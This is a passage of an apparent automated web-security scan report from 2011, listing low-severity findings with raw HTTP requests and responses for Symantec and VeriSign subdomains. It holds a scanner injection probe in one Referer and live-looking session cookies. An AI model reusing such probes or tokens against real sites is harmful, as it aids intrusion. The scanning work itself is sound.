Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:29 GMT
Content-Length: 37327

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

22.18. https://cert.webtrust.org/ViewSeal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Request

GET /ViewSeal HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:30 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2834

java.lang.NumberFormatException: null
   at java.lang.Integer.parseInt(Integer.java:394)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29)
   
...[SNIP]...

22.19. https://enterprise-ssl-admin.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprise-ssl-admin.verisign.com
Path:   /

Request

GET / HTTP/1.1
Host: enterprise-ssl-admin.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:41:53 GMT
Content-length: 1304
Content-type: text/html
Connection: close

<HTML>

<HEAD>
<TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE>
<link href="../stylesheet.css" rel="stylesheet" type="text/css" />
</HEAD>

<BODY>
<table width=720 bord
...[SNIP]...

22.20. https://fileconnect.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /

Request

GET / HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:04:07 GMT
Content-length: 11587
Content-type: text/html
Content-Language: en-US


<HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE>
<!--[if IE]>
<LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen>
<![endif]
...[SNIP]...

22.21. https://fileconnect.symantec.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:04:04 GMT
Content-length: 1214
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

22.22. https://fileconnect.symantec.com/javascript/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /javascript/common.js

Request

GET /javascript/common.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:55 GMT
Content-length: 1214
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Request

GET /support/ssl-certificates-support/index HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close

<!--
<script type="text/javascript" language="javascript">
   window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404";
//-->
</script>

22.24. https://knowledge.verisign.com/support/code-signing-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index

Request

GET /support/code-signing-support/index HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:44:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close

<!--
<script type="text/javascript" language="javascript">
   window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404";
//-->
</script>

22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index

Request

GET /support/mpki-for-ssl-support/index HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:44:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close

<!--
<script type="text/javascript" language="javascript">
   window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404";
//-->
</script>

22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index

Request

GET /support/ssl-certificates-support/index HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:43:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close

<!--
<script type="text/javascript" language="javascript">
   window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404";
//-->
</script>

22.27. http://partnerlocator.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partnerlocator.symantec.com
Path:   /

Request

GET / HTTP/1.1
Host: partnerlocator.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:46:04 GMT
Content-Type: text/html
Content-Length: 615
Connection: close

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.8.54</center>
</bod
...[SNIP]...

22.28. http://partnerlocator.symantec.com/public/product_finder

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partnerlocator.symantec.com
Path:   /public/product_finder

Request

GET /public/product_finder HTTP/1.1
Host: partnerlocator.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:45:58 GMT
Content-Type: text/html
Connection: close
Content-Length: 34

<h1>500 Internal Server Error</h1>

22.29. http://partnerlocator.symantec.com/public/pulldown_list

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partnerlocator.symantec.com
Path:   /public/pulldown_list

Request

GET /public/pulldown_list;plist=country;search_term=un;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
X-Prototype-Version: 1.5.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:52 GMT
Content-Type: text/html
Content-Length: 615
Connection: keep-alive

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.8.54</center>
</bod
...[SNIP]...

22.30. http://partnerlocator.symantec.com/public/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partnerlocator.symantec.com
Path:   /public/search

Request

POST /public/search HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
Content-Length: 85
Cache-Control: max-age=0
Origin: http://partnerlocator.symantec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Djavascript%2525253Arequired_country_with_submit%25252528document.select_country%2525252C%25252527Please%25252520select%25252520a%25252520country.%25252527%25252529%2525253B%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

locale=en-us&country=United+Arab+Emirates&country_name=United+Arab+Emirates+&_search=

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:58 GMT
Content-Type: text/html
Content-Length: 615
Connection: keep-alive

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.8.54</center>
</bod
...[SNIP]...

22.31. https://partnernet.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://partnernet.symantec.com
Path:   /

Request

GET / HTTP/1.1
Host: partnernet.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:06 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Thu, 12 May 2011 19:48:14 GMT
ETag: "70c638-47-4a3197842db80"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/html

<meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">

22.32. http://player.ooyala.com/info/primary/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /info/primary/

Request

GET /info/primary/ HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 381
Date: Fri, 09 Sep 2011 21:25:47 GMT
Connection: close
Vary: Accept-Encoding

LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ
...[SNIP]...

22.33. https://policy3.responsys.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /

Request

GET / HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:00 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "2ef9310-155-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 341
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Permission Policy</title>
<meta http-equiv="Refresh" content="0; URL=./permission.htm"
<meta http-equiv="Content-Ty
...[SNIP]...

22.34. https://renewals.symantec.com/renewals/chat_norton.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/chat_norton.jsp

Request

GET /renewals/chat_norton.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Length: 1638
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>

...[SNIP]...

22.35. https://securitycenter.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /

Request

GET / HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:41 GMT
Content-length: 129
Content-type: text/html
Last-modified: Thu, 23 Dec 2004 19:39:49 GMT
Etag: "81-41cb1f05"
Accept-ranges: bytes

<html>
<head>
<meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/">
</head>
<body></body>
</html>

22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/orderStatus

Request

GET /celp/enroll/orderStatus HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:32 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

22.38. https://securitycenter.verisign.com/celp/enroll/retail

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/retail

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:17 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

22.39. https://securitycenter.verisign.com/celp/enroll/upsell

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/upsell

Request

GET /celp/enroll/upsell HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:32 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ4o0r1eq0XdEuNa8cCA2iDyk4r5r7iuywwlssiJ0mmB13GoVxZ!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/TeaLeafTarget.html

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
